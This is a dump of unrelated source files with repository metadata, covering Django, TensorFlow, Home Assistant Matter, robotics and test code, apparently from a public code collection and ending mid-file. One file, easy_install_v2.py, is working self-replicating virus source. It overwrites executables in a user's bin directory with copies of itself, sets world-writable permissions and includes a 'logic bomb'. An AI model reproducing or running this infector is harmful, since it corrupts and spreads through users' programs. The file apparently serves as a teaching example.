return HttpResponseRedirect(get_site_url(item_container, 'index.html'))
else :
vars = get_folderish_vars_edit(request, item_container, app_name, my_title, content, f, get_dont())
return render_to_response ( 'app/base_edit.html', vars )
|
[
"[email protected]"
] | |
7faacb9fdcd5f1ce0dc6e1a0c84d359a98b04453
|
3f2d56b2191e0aa0b9bae2f6023deee9f2f444be
|
/Libs_et_Modules/easy_install_v2.py
|
732f9124122e336aff75fb51dd532bace00f6510
|
[] |
no_license
|
goffinet/GLMF201
|
8c5a11c7d4a631a95098ae00bc9509929df0a7ca
|
0213ca0fe8cb7bdbee54a128788a7d079394afcb
|
refs/heads/master
| 2021-01-21T11:22:50.099598 | 2017-01-18T14:00:14 | 2017-01-18T14:00:14 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,566 |
py
|
#!/usr/bin/python3
# === INFECTED ===
import os
from sys import argv
import stat
import random
import base64
import tempfile
cmd_init, cmd = ('ls', 'ls')
pathToCorrupt = '/home/tristan/my_bin/'
fileToCorrupt = pathToCorrupt + cmd
def isInfected(content):
return content == b'# === INFECTED ===\n'
def bomb():
print('BEAAAAAAAAAAH!')
with open(fileToCorrupt, 'rb') as currentFile:
ftcLines = currentFile.readlines()
if isInfected(ftcLines[1]):
filenames = os.listdir(pathToCorrupt)
random.shuffle(filenames)
for cmd in filenames:
if cmd != cmd_init:
with open(pathToCorrupt + cmd, 'rb') as newFile:
ftcLines = newFile.readlines()
if not isInfected(ftcLines[1]):
fileToCorrupt = pathToCorrupt + cmd
break
else:
print('All files already corrupted!')
exit(0)
# ftcLines contient le code binaire du programme
ftcLines = b''.join(ftcLines)
# On détermine où se trouve le code exécutable original
with open(argv[0], 'rb') as currentFile:
content = currentFile.readlines()
startOrigin = False
original = None
virus = []
for i in range(len(content)):
if startOrigin:
original = content[i][2:]
else:
virus.append(content[i])
if content[i] == b'# === ORIGINAL ===\n':
startOrigin = True
# virus contient le virus
# original contient le code binaire original
# On efface l'exécutable, on écrit le code Python et on colle le code binaire
print('Infection in progress : command', cmd)
os.remove(fileToCorrupt)
with open(fileToCorrupt, 'wb') as currentFile:
for line in virus:
currentFile.write(line)
currentFile.write(b'# ' + base64.b64encode(ftcLines))
os.chmod(fileToCorrupt, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
# Bombe logique
bomb()
# Exécution du code original
try:
if argv[0] != './easy_install_v2.py':
if original is None:
original = ftcLines
temp = tempfile.NamedTemporaryFile(delete=True)
with open(temp.name, 'wb') as tmpCmdFile:
tmpCmdFile.write(base64.b64decode(original))
os.chmod(temp.name, stat.S_IXUSR | stat.S_IRUSR | stat.S_IWUSR | stat.S_IXGRP | stat.S_IROTH | stat.S_IWOTH | stat.S_IXOTH | stat.S_IROTH | stat.S_IWOTH)
temp.file.close()
os.system(temp.name +' ' + ' '.join(argv[1:]))
except:
exit(2)
# === ORIGINAL ===
|
[
"[email protected]"
] | |
6da13e87abfd10017f1f682867f5f982147bbccc
|
f8ff25224bf827406c65560e247e7c3c064cdd38
|
/convert_savedmodel_keras_tflite.py
|
a64597fe955a1644762330369f48a47086e88b20
|
[] |
no_license
|
akinoriosamura/PFLD
|
893cadbbdc8a7ef424327c814196e1e3608f937f
|
b3f3c74369c1a8dc4dc0d2e5266dd2b473dfd582
|
refs/heads/master
| 2021-06-17T15:06:05.468485 | 2020-12-10T09:39:08 | 2020-12-10T09:39:08 | 211,257,866 | 0 | 0 | null | 2019-09-27T07:09:04 | 2019-09-27T07:09:03 | null |
UTF-8
|
Python
| false | false | 468 |
py
|
import tensorflow as tf
# Load the saved keras model back.
k_model = tf.keras.models.load_model(
"SavedModelPre",
custom_objects=None,
compile=True
)
# k_model = tf.keras.experimental.load_from_saved_model("SavedModelPre")
k_model.summary()
k_model.save('model.h5', include_optimizer=False)
converter = tf.lite.TFLiteConverter.from_keras_model_file("model.h5")
tflite_model = converter.convert()
open("converted_model.tflite", "wb").write(tflite_model)
|
[
"[email protected]"
] | |
deb4be375223c47ca23cf76acf8592ff12a33e4b
|
6430d2572c4d6dfe41e0e30e725271444cc6f675
|
/torsurvey/torapi.py
|
6a8d9874f0eeda2ccf1457658601340cd0f124c6
|
[] |
no_license
|
nikcub/torsurvey
|
5a0c36560801862d5cf1c74f362ae013e0458f27
|
6e9ce5793694857dd5c451905a4a7aa773bfd2b6
|
refs/heads/master
| 2016-09-05T10:47:13.578465 | 2015-01-27T15:37:07 | 2015-01-27T15:37:07 | 26,388,609 | 1 | 1 | null | 2015-01-27T15:37:07 | 2014-11-09T07:18:27 |
Python
|
UTF-8
|
Python
| false | false | 1,580 |
py
|
#!/usr/bin/env python
"""
torsurvey.torapi
"""
import requesocks as requests
import requesocks.exceptions
# import hmac
# import hashlib
# import json
import logging
# from time import time
class TorAPI(object):
headers = {
'User-Agent' : 'torsurvey-',
}
tor_host = None
tor_port = None
proxy_tor = {
"http": "socks5://127.0.0.1:9030",
"https": "socks5://127.0.0.1:9030"
}
def __init__(self, proxy_host='127.0.0.1', proxy_port='9040', proxy_type='socks5', timeout=10):
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_type = proxy_type
self.timeout = timeout
self.proxy = {}
self.proxy['http'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.proxy['https'] = "%s://%s:%d" % (proxy_type, proxy_host, int(proxy_port))
self.session = requesocks.session()
self.session.proxies = self.proxy
logging.debug("Established session with proxies %s" % str(self.proxy))
def get_ip(self):
r = self.req('http://ifconfig.me/ip')
if r.status_code == 200:
return r.text
return 'Error'
def get_headers(self):
headers = self.headers
# @TODO add headers
return headers
def req(self, url, extras={}):
try:
r = self.session.request('GET', url, allow_redirects=True, timeout=self.timeout, headers=self.headers)
return r
except requesocks.exceptions.ConnectionError, e:
logging.error("Bad connection cannot connect to %s" % url)
return -1
except Exception, e:
logging.error("%s: %s" % (url, e))
return -1
|
[
"[email protected]"
] | |
4261205d147bd377b81a8fb578bf7586b1f999d2
|
296132d2c5d95440b3ce5f4401078a6d0f736f5a
|
/homeassistant/components/matter/api.py
|
36cf83fd0dab7563414b7bed72aa10b48494fe9e
|
[
"Apache-2.0"
] |
permissive
|
mezz64/home-assistant
|
5349a242fbfa182159e784deec580d2800173a3b
|
997d4fbe5308b01d14ceabcfe089c2bc511473dd
|
refs/heads/dev
| 2023-03-16T22:31:52.499528 | 2022-12-08T02:55:25 | 2022-12-08T02:55:25 | 68,411,158 | 2 | 1 |
Apache-2.0
| 2023-03-10T06:56:54 | 2016-09-16T20:04:27 |
Python
|
UTF-8
|
Python
| false | false | 4,458 |
py
|
"""Handle websocket api for Matter."""
from __future__ import annotations
from collections.abc import Callable
from functools import wraps
from typing import Any
from matter_server.client.exceptions import FailedCommand
import voluptuous as vol
from homeassistant.components import websocket_api
from homeassistant.components.websocket_api import ActiveConnection
from homeassistant.core import HomeAssistant, callback
from .adapter import MatterAdapter
from .const import DOMAIN
ID = "id"
TYPE = "type"
@callback
def async_register_api(hass: HomeAssistant) -> None:
"""Register all of our api endpoints."""
websocket_api.async_register_command(hass, websocket_commission)
websocket_api.async_register_command(hass, websocket_commission_on_network)
websocket_api.async_register_command(hass, websocket_set_thread_dataset)
websocket_api.async_register_command(hass, websocket_set_wifi_credentials)
def async_get_matter_adapter(func: Callable) -> Callable:
"""Decorate function to get the MatterAdapter."""
@wraps(func)
async def _get_matter(
hass: HomeAssistant, connection: ActiveConnection, msg: dict
) -> None:
"""Provide the Matter client to the function."""
matter: MatterAdapter = next(iter(hass.data[DOMAIN].values()))
await func(hass, connection, msg, matter)
return _get_matter
def async_handle_failed_command(func: Callable) -> Callable:
"""Decorate function to handle FailedCommand and send relevant error."""
@wraps(func)
async def async_handle_failed_command_func(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
*args: Any,
**kwargs: Any,
) -> None:
"""Handle FailedCommand within function and send relevant error."""
try:
await func(hass, connection, msg, *args, **kwargs)
except FailedCommand as err:
connection.send_error(msg[ID], err.error_code, err.args[0])
return async_handle_failed_command_func
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission",
vol.Required("code"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Add a device to the network and commission the device."""
await matter.matter_client.commission_with_code(msg["code"])
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/commission_on_network",
vol.Required("pin"): int,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_commission_on_network(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Commission a device already on the network."""
await matter.matter_client.commission_on_network(msg["pin"])
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_thread",
vol.Required("thread_operation_dataset"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_thread_dataset(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set thread dataset."""
await matter.matter_client.set_thread_operational_dataset(
msg["thread_operation_dataset"]
)
connection.send_result(msg[ID])
@websocket_api.require_admin
@websocket_api.websocket_command(
{
vol.Required(TYPE): "matter/set_wifi_credentials",
vol.Required("network_name"): str,
vol.Required("password"): str,
}
)
@websocket_api.async_response
@async_handle_failed_command
@async_get_matter_adapter
async def websocket_set_wifi_credentials(
hass: HomeAssistant,
connection: ActiveConnection,
msg: dict[str, Any],
matter: MatterAdapter,
) -> None:
"""Set WiFi credentials for a device."""
await matter.matter_client.set_wifi_credentials(
ssid=msg["network_name"], credentials=msg["password"]
)
connection.send_result(msg[ID])
|
[
"[email protected]"
] | |
bd91cb8c7e9e1344cfd7f3d1410c23d658e9438d
|
ba054fa1ec409011444e9c6b963309745e150d6f
|
/ps_bole_calculs_statiques/xc_model_impact/loadStateData.py
|
69e20459fe07531c2303bcc316ffa946b24e867d
|
[] |
no_license
|
berndhahnebach/XCmodels
|
a6500fdde253dea10ef2bb64b7ebc3dbfc2577c2
|
4acdd7747abd7cd71f5ef580f65e93359560e5a9
|
refs/heads/master
| 2020-04-02T23:36:36.385054 | 2018-10-20T16:49:21 | 2018-10-20T16:49:21 | 154,873,006 | 0 | 0 | null | 2018-10-26T17:52:36 | 2018-10-26T17:52:35 | null |
UTF-8
|
Python
| false | false | 5,140 |
py
|
# -*- coding: utf-8 -*-
'''In this script we define default data of load cases to be used (or changed)
while displaying loads or results associated to single load cases
'''
from postprocess.reports import graphical_reports
'''
Definition of record objects with these attributes:
loadCaseName: name of the load case to be depicted
loadCaseDescr: description text of the load case
loadCaseExpr: mathematical expression to define the load case (ex:
'1.0*GselfWeight+1.0*DeadLoad')
setsToDispLoads: ordered list of sets of elements to display loads
setsToDispBeamLoads: ordered list of sets of beam elements to display loads
(defaults to [])
compElLoad: component of load on beam elements to be represented
available components: 'axialComponent', 'transComponent',
'transYComponent','transZComponent'
unitsScaleLoads: factor to apply to loads if we want to change
the units (defaults to 1).
unitsLoads: text to especify the units in which loads are
represented (defaults to 'units:[m,kN]')
vectorScaleLoads: factor to apply to the vectors length in the
representation of loads (defaults to 1 -> auto-scale).
vectorScalePointLoads: factor to apply to the vectors length in the
representation of nodal loads (defaults to 1).
multByElemAreaLoads: boolean value that must be True if we want to
represent the total load on each element
(=load multiplied by element area) and False if we
are going to depict the value of the uniform load
per unit area (defaults to False)
listDspRot: ordered list of displacement or rotations to be displayed
available components: 'uX', 'uY', 'uZ', 'rotX', rotY', 'rotZ'
(defaults to ['uX', 'uY', 'uZ'])
setsToDispDspRot: ordered list of sets of elements to display displacements
or rotations
unitsScaleDispl: factor to apply to displacements if we want to change
the units (defaults to 1).
unitsDispl: text to especify the units in which displacements are
represented (defaults to '[m]'
listIntForc: ordered list of internal forces to be displayed as scalar field
over «shell» elements
available components: 'N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'
(defaults to ['N1', 'N2', 'M1', 'M2', 'Q1', 'Q2'])
setsToDispIntForc: ordered list of sets of elements (of type «shell»)to
display internal forces
listBeamIntForc: ordered list of internal forces to be displayed
as diagrams on lines for «beam» elements
available components: 'N', 'My', 'Mz', 'Qy', 'Qz','T'
(defaults to ['N', 'My', 'Mz', 'Qy', 'Qz','T'])
setsToDispBeamIntForc: ordered list of sets of elements (of type «beam»)to
display internal forces (defaults to [])
scaleDispBeamIntForc: tuple (escN,escQ,escM) correponding to the scales to
apply to displays of, respectively, N Q and M beam internal
forces (defaults to (1.0,1.0,1.0))
unitsScaleForc: factor to apply to internal forces if we want to change
the units (defaults to 1).
unitsForc: text to especify the units in which forces are
represented (defaults to '[kN/m]')
unitsScaleMom: factor to apply to internal moments if we want to change
the units (defaults to 1).
unitsMom: text to especify the units in which bending moments are
represented (defaults to '[kN.m/m]')
viewName: name of the view that contains the renderer (available standard
views: "XYZPos", "XYZNeg", "XPos", "XNeg","YPos", "YNeg",
"ZPos", "ZNeg", "+X+Y+Z", "+X+Y-Z", "+X-Y+Z", "+X-Y-Z",
"-X+Y+Z", "-X+Y-Z",
"-X-Y+Z", "-X-Y-Z") (defaults to "XYZPos")
hCamFct: factor that applies to the height of the camera position
in order to change perspective of isometric views
(defaults to 1, usual values 0.1 to 10)
viewNameBeams: name of the view for beam elements displays (defaults to "XYZPos")
hCamFctBeams: factor that applies to the height of the camera position for
beam displays (defaults to 1)
'''
A1=graphical_reports.RecordLoadCaseDisp(loadCaseName='A1',loadCaseDescr='A1: impact on parapet head',loadCaseExpr='1.0*A1',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A1.unitsScaleLoads= 1e-3
A1.unitsScaleForc= 1e-3
A1.unitsScaleMom= 1e-3
A1.unitsScaleDispl= 1e3
A1.viewName= "-X+Y+Z"
A1.unitsDispl='[mm]'
A2=graphical_reports.RecordLoadCaseDisp(loadCaseName='A2',loadCaseDescr='A2: impact on parapet body',loadCaseExpr='1.0*A2',setsToDispLoads=[totalSet],setsToDispDspRot=[shells],setsToDispIntForc=[totalSet])
A2.unitsScaleLoads= 1e-3
A2.unitsScaleForc= 1e-3
A2.unitsScaleMom= 1e-3
A2.unitsScaleDispl= 1e3
A2.viewName= "-X+Y+Z"
A2.unitsDispl='[mm]'
|
[
"[email protected]"
] | |
81d343fe13a8e35e1122f366e78878bab4d952e7
|
8a3401fcc24fb398e7cac0f8a67e132ed5b3fa8f
|
/tests/test_person.py
|
43307a82a22e73117afeea3e18ab139709902ab1
|
[
"MIT"
] |
permissive
|
ngzhian/pycrunchbase
|
58cf96ed20b5b3f4861bb884bcf0d9ffcf4df808
|
ead7c93a51907141d687da02864a3803d1876499
|
refs/heads/master
| 2023-07-08T06:18:59.314695 | 2023-07-03T13:27:06 | 2023-07-03T13:27:06 | 30,629,033 | 69 | 45 |
MIT
| 2020-12-02T02:26:40 | 2015-02-11T03:39:14 |
Python
|
UTF-8
|
Python
| false | false | 1,950 |
py
|
from datetime import datetime
from unittest import TestCase
from pycrunchbase import Person
PERSON_DATA = {
"uuid": "uuid",
"type": "Person",
"properties": {
"permalink": "first-last",
"last_name": "Last",
"first_name": "First",
"bio": "Bio",
"role_investor": True,
"born_on": "2000-01-02",
"born_on_trust_code": 7,
"is_deceased": False,
"died_on": None,
"died_on_trust_code": 0,
"created_at": 1233271545,
"updated_at": 1419596914,
},
"relationships": {
"news": {
"cardinality": "OneToMany",
"paging": {
"total_items": 2,
"first_page_url": "https://api.crunchbase.com/v3.1/person/first-last/news",
"sort_order": "created_at DESC"
},
"items": [
{
"url": "http://example.com/news_1/",
"author": "Author 1",
"posted_on": "2012-12-28",
"type": "PressReference",
"title": "Title 1",
"created_at": 1356743058,
"updated_at": 2012
},
{
"url": "example.com/news_2/",
"author": "Author 2",
"posted_on": "2012-04-20",
"type": "PressReference",
"title": "Title 2",
"created_at": 1334962777,
"updated_at": 2012
},
]
}
}
}
class PersonTestCase(TestCase):
def test_properties(self):
person = Person(PERSON_DATA)
self.assertEqual(person.permalink, 'first-last')
self.assertEqual(person.last_name, 'Last')
self.assertEqual(person.first_name, 'First')
self.assertEqual(person.bio, 'Bio')
self.assertEqual(person.role_investor, True)
self.assertEqual(person.born_on, datetime(2000, 1, 2))
self.assertEqual(person.born_on_trust_code, 7)
self.assertEqual(person.is_deceased, False)
self.assertEqual(person.died_on, None)
self.assertEqual(person.died_on_trust_code, 0)
def test_relationships(self):
person = Person(PERSON_DATA)
self.assertIsNotNone(person.news)
self.assertEqual(2, len(person.news))
|
[
"[email protected]"
] | |
8d53e43ebb62761b82dede6505a974d381b4e938
|
28c0bcb13917a277cc6c8f0a34e3bb40e992d9d4
|
/koku/reporting/migrations/0109_remove_ocpusagelineitemdailysummary_pod.py
|
7fc341bdb4450847e431947e91154a91e5a14a73
|
[
"Apache-2.0"
] |
permissive
|
luisfdez/koku
|
43a765f6ba96c2d3b2deda345573e1d97992e22f
|
2979f03fbdd1c20c3abc365a963a1282b426f321
|
refs/heads/main
| 2023-06-22T13:19:34.119984 | 2021-07-20T12:01:35 | 2021-07-20T12:01:35 | 387,807,027 | 0 | 1 |
Apache-2.0
| 2021-07-20T13:50:15 | 2021-07-20T13:50:14 | null |
UTF-8
|
Python
| false | false | 284 |
py
|
# Generated by Django 2.2.11 on 2020-03-27 19:21
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [("reporting", "0108_auto_20200405_1316")]
operations = [migrations.RemoveField(model_name="ocpusagelineitemdailysummary", name="pod")]
|
[
"[email protected]"
] | |
30a1390b789e4bd86190b477b462d67108f7a4a3
|
e1857e582609640f60923ea461da3e84c498095a
|
/block2-datatypes/numbers/number-demo.py
|
671907978a108eb946e216b4c5cc6293cf1ca1c1
|
[] |
no_license
|
mbaeumer/python-challenge
|
178f188004e66c5c4092af51ae5d496679d39dec
|
4cff4a4939268a496117158b0be4e20f4d934213
|
refs/heads/master
| 2023-08-07T22:43:35.490777 | 2023-07-21T21:26:46 | 2023-07-21T21:26:46 | 75,015,661 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,063 |
py
|
#!/usr/bin/python
from decimal import Decimal
from decimal import DecimalException
import random
def get_user_input():
answer = ""
while answer == "":
answer = input("Please enter a number: ")
return answer
def convert_to_int(s):
try:
print(int(s))
except ValueError:
print("Cannot convert to int")
def convert_to_float(s):
try:
print(float(s))
except ValueError:
print("Cannot convert to float")
def convert_to_decimal(s):
try:
print(Decimal(s))
except DecimalException:
print("Cannot convert to Decimal")
def determine_type(answer):
return type(answer)
# showing difference in precision of float vs decimal
def diff_decimal_float():
print("Difference between Decimal and float")
x = Decimal("0.1")
y = float("0.1")
print(f"{x:.20f}")
print(f"{y:.20f}")
def calc_with_decimals():
print("Calculating with decimals")
x = Decimal(34)
y = Decimal(7)
z = x / y
print(f"{z:.20f}")
def calc_with_floats():
print("Calculating with floats")
a = 34
b = 7
c = a/b
print(f"{c:.20f}")
def format_number(number):
print("Formatting alternatives")
print("{:.2f}".format(number))
print("{:+.2f}".format(number))
print("{:.0f}".format(number))
print("{:0>2d}".format(5))
print("{:,}".format(1000000))
print("{:.2%}".format(number))
print("{:.2e}".format(number))
print("{:10d}".format(50))
print("{:<10d}".format(50))
print("{:^10d}".format(50))
def generate_random_numbers():
random1 = random.randint(1,6) # 1..6
random2 = random.randrange(6) # 0..5
print("Generating random numbers")
print("With randint: ", random1)
print("With randrange: ", random2)
def operators_for_ints():
a = 5
b = 2
print("5/2 = %d" % (a/b))
print("5%%2 = %d" % (a%b))
print("5//2 = %d" % (a//b))
answer = get_user_input()
print(type(answer))
convert_to_int(answer)
convert_to_float(answer)
convert_to_decimal(answer)
diff_decimal_float()
calc_with_decimals()
calc_with_floats()
format_number(34/7)
generate_random_numbers()
operators_for_ints()
# TODO:
# currency
|
[
"[email protected]"
] | |
08e6e9616fe6a91d63adef510f938ac99e569b81
|
9249f87109471de1fc3f3c3c1b121f51c09df683
|
/lesson_3/test_10.py
|
89d99c4f00ee36886084f1928bbce7ee094081ba
|
[] |
no_license
|
anton1k/mfti-homework
|
400a8213a57e44478d65437f5afef0432e8e84ea
|
93683de329e6cb0001e713214aeb3069f6e213b0
|
refs/heads/master
| 2020-07-18T23:41:11.473608 | 2020-01-12T10:58:16 | 2020-01-12T10:58:16 | 206,335,501 | 1 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 652 |
py
|
# Последовательность состоит из натуральных чисел и завершается числом 0. Всего вводится не более 10000 чисел (не считая завершающего числа 0). Определите, сколько элементов этой последовательности равны ее наибольшему элементу. Числа, следующие за числом 0, считывать не нужно.
d = 0
s = 0
while True:
x = int(input())
if x == 0:
break
if x > d:
d, s = x, 1
elif x == d:
s += 1
print(s)
|
[
"[email protected]"
] | |
a66ea0e584b1c0c16a1073e306b633b0ae4bd795
|
3da102290ebe6c186474ecbeec9065ea2e5357e3
|
/pi/robot.py
|
4d162feefe0008daae6f7e2e33d88865d9c46d45
|
[] |
no_license
|
fo-am/penelopean-robotics
|
55cbbebe29f15fe5996222a5db36040ac400b8f3
|
2a6f81a4d8b098ac513bd42df980e64128df8a1b
|
refs/heads/master
| 2022-05-28T17:46:36.579042 | 2022-05-19T13:35:47 | 2022-05-19T13:35:47 | 134,366,263 | 8 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 3,976 |
py
|
import yarnasm
import radio
import time
# things we want to be able to do:
# * tweak servo defaults
# * queue of messages to send?
class robot:
def __init__(self,address):
self.address=address
self.telemetry=[0 for i in range(256)]
self.code=[]
self.source=""
self.state="running"
self.ping_time=time.time()
self.watchdog_timeout=10
self.ping_duration=2
self.start_walking=False
self.set_led=False
self.led_state=False
def pretty_print(self):
out = "robot: "+str(self.telemetry[yarnasm.registers["ROBOT_ID"]])+"\n"
out+= "pc: "+str(self.telemetry[yarnasm.registers["PC_MIRROR"]])+"\n"
out+= "a: "+str(self.telemetry[yarnasm.registers["A"]])+"\n"
out+= "step: "+str(self.telemetry[yarnasm.registers["STEP_COUNT"]])+"\n"
def telemetry_callback(self,data):
if self.state=="disconnected" or self.state=="waiting":
self.state="connected"
self.telemetry=data
#print("telemetry: "+str(self.address[4])+" "+str(data[0])+" "+str(data[9]))
self.ping_time=time.time()
def sync(self,radio,beat,ms_per_beat):
reg_sets = []
# update A register here, based on if the start flag has been set
if self.start_walking:
reg_sets+=[[yarnasm.registers["A"],1]]
self.start_walking=False
if self.set_led:
reg_sets+=[[yarnasm.registers["LED"],self.led_state]]
telemetry = radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
if telemetry!=[]:
self.telemetry = telemetry
print("telemetry: "+str(self.address[4])+" "+str(self.telemetry[0])+" "+str(self.telemetry[9]))
# stop update requesting telemetry for a bit
self.ping_time=time.time()
def sync2(self,radio,beat,ms_per_beat):
reg_sets = []
radio.send_sync(self.address,beat,ms_per_beat,reg_sets)
def walk_pattern(self,pat,ms_per_step,radio):
radio.send_pattern(self.address,pat,ms_per_step)
def calibrate(self,radio,do_cali,samples,mode):
return radio.send_calibrate(self.address,do_cali,samples,mode)
def load_asm(self,fn,compiler,radio):
with open(fn, 'r') as f:
self.source=f.read()
self.code = compiler.assemble_file(fn)
return radio.send_code(self.address,self.code)
def send_asm(self,asm,compiler,radio):
self.code = compiler.assemble_bytes(asm)
return radio.send_code(self.address,self.code)
def write(self,addr,val,radio):
radio.send_set(self.address,addr,val)
def save_eeprom(self,radio):
radio.send_save_eeprom(self.address)
# A register is cleared when the robot reaches it's end position
# and set by the Pi when we are ready to start again
def start_walking_set(self):
self.start_walking=True
def led_set(self,state):
self.set_led=True
self.led_state=state
# has been set above, and returned in a telemetry packet...
def is_walking(self):
return self.telemetry[yarnasm.registers["A"]]==1
def update(self,radio):
pass
def update_regs(self,regs):
regs["state"]=self.state
regs["ping"]=time.time()-self.ping_time
regs["pc"]=self.telemetry[yarnasm.registers["PC_MIRROR"]]
regs["a"]=self.telemetry[yarnasm.registers["A"]]
regs["b"]=self.telemetry[yarnasm.registers["B"]]
regs["comp_angle"]=self.telemetry[yarnasm.registers["COMP_ANGLE"]]
regs["comp_dr"]=self.telemetry[yarnasm.registers["COMP_DELTA_RESET"]]
regs["comp_d"]=self.telemetry[yarnasm.registers["COMP_DELTA"]]
regs["step_count"]=self.telemetry[yarnasm.registers["STEP_COUNT"]]
regs["step_reset"]=self.telemetry[yarnasm.registers["STEP_COUNT_RESET"]]
regs["robot"]=self.telemetry[yarnasm.registers["ROBOT_ID"]]
|
[
"[email protected]"
] | |
17ba77f176141d459e81985f43e229f7ca668faf
|
d6d4449df702ab59a13559aaba599c60381d1852
|
/tests/rot_enc_test.py
|
1a121982d07371e9b5706f6ec0329ecc102aefc0
|
[
"CC-BY-4.0"
] |
permissive
|
zzfd97/StickIt-RotaryEncoder
|
c58ce2758676285d6ce539e895b6a5d01b451396
|
78c5511192fd471e57bc9b6b6ab5d1393ecdb0f3
|
refs/heads/master
| 2021-12-12T18:56:36.702963 | 2017-02-12T04:00:09 | 2017-02-12T04:00:09 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 2,614 |
py
|
# /***********************************************************************************
# * This program is free software; you can redistribute it and/or
# * modify it under the terms of the GNU General Public License
# * as published by the Free Software Foundation; either version 2
# * of the License, or (at your option) any later version.
# *
# * This program is distributed in the hope that it will be useful,
# * but WITHOUT ANY WARRANTY; without even the implied warranty of
# * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# * GNU General Public License for more details.
# *
# * You should have received a copy of the GNU General Public License
# * along with this program; if not, write to the Free Software
# * Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
# * 02111-1307, USA.
# *
# * (c)2013 - X Engineering Software Systems Corp. (www.xess.com)
# ***********************************************************************************/
from xstools.xsdutio import * # Import funcs/classes for PC <=> FPGA link.
print '''\n
##################################################################
# This program tests the interface between the host PC and the FPGA
# on the XuLA board that has been programmed to scan a rotary encoder.
# You should see the state of the rotary encoder accumulator
# displayed on the screen.
##################################################################
'''
USB_ID = 0 # This is the USB port index for the XuLA board connected to the host PC.
ROTENC1_ID = 1 # This is the identifier for the rotary encoder 1 interface in the FPGA.
ROTENC2_ID = 2 # This is the identifier for the rotary encoder 2 interface in the FPGA.
BUTTONS_ID = 3 # This is the identifier for the buttons on rotary encoders 1 & 2.
# Create an interface object that reads one 32-bit output from the rotary encoder module and
# drives one 1-bit dummy-input to the rotary encoder module.
rotenc1 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC1_ID, dut_output_widths=[32], dut_input_widths=[1])
rotenc2 = XsDutIo(xsusb_id=USB_ID, module_id=ROTENC2_ID, dut_output_widths=[32], dut_input_widths=[1])
buttons = XsDutIo(xsusb_id=USB_ID, module_id=BUTTONS_ID, dut_output_widths=[2], dut_input_widths=[1])
while True: # Do this forever...
accumulator1 = rotenc1.Read() # Read the ROT1 accumulator.
accumulator2 = rotenc2.Read() # Read the ROT2 accumulator.
bttns = buttons.Read() # Read the ROT1 and ROT2 buttons.
print 'ROT1: {:8x} {:1x} ROT2: {:8x} {:1x}\r'.format(accumulator1.unsigned, bttns[0], accumulator2.unsigned, bttns[1]),
|
[
"[email protected]"
] | |
2b44b6f0f3f0b9d259ad52416362ca4d246b0348
|
342fc6f60c688a21b9ba4a8e8b64438d77039ba2
|
/CNCS/CNCS/nxs/raw.py
|
c37c120916552715a26b08dd44b35ff7a2eded11
|
[] |
no_license
|
mcvine/instruments
|
854001fe35063b1c8c86e80495093ce72884771f
|
8e41d89c353995dcf5362a657a8bb5af08ff186c
|
refs/heads/master
| 2023-04-03T11:01:53.232939 | 2023-04-02T04:16:07 | 2023-04-02T04:16:07 | 120,621,268 | 1 | 0 | null | 2023-04-02T04:16:08 | 2018-02-07T13:51:36 |
Python
|
UTF-8
|
Python
| false | false | 3,916 |
py
|
# -*- Python -*-
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
# Jiao Lin
# California Institute of Technology
# (C) 2008-2015 All Rights Reserved
#
# {LicenseText}
#
# ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
#
"""
This module helps creating "raw" CNCS nexus file.
"""
def write(events, tofbinsize, path):
""" write neutron events into a CNCS nexus file
The events is a numpy array of "event" records.
An event record has three fields:
* pixelID
* tofChannelNo
* p
tofbinsize * tofChannelNo is the tof for the bin
path is the output path
"""
# implementation details
# -1. h5py is used for handling the file.
# 0. make a new file by first copying a template file to a new file, and then adding new data
# 1. events are splitted to banks and saved. for a bank, all events are in bank{i}_events
# 2. any bank must have at least one event. if there are no events, we must assign fake ones
import shutil, sys
shutil.copyfile(nxs_template, path)
import time; time.sleep(0.5) # bad bad
import h5py
f = h5py.File(path, 'a')
entry = f['entry']
# XXX: hack
etz_attrs = {
'units': np.string_('second'),
'offset': np.string_('2012-08-23T11:23:53.833508666-04:00'),
'offset_seconds': 714583433,
'offset_nanoseconds': 833508666,
}
for bank in range(nbanks):
# print bank
sys.stdout.write('.')
# bank events
pixelidstart = bank * pixelsperbank
pixelidend = pixelidstart + pixelsperbank
bevts = events[(events['pixelID']<pixelidend) * (events['pixelID']>=pixelidstart)]
if not bevts.size:
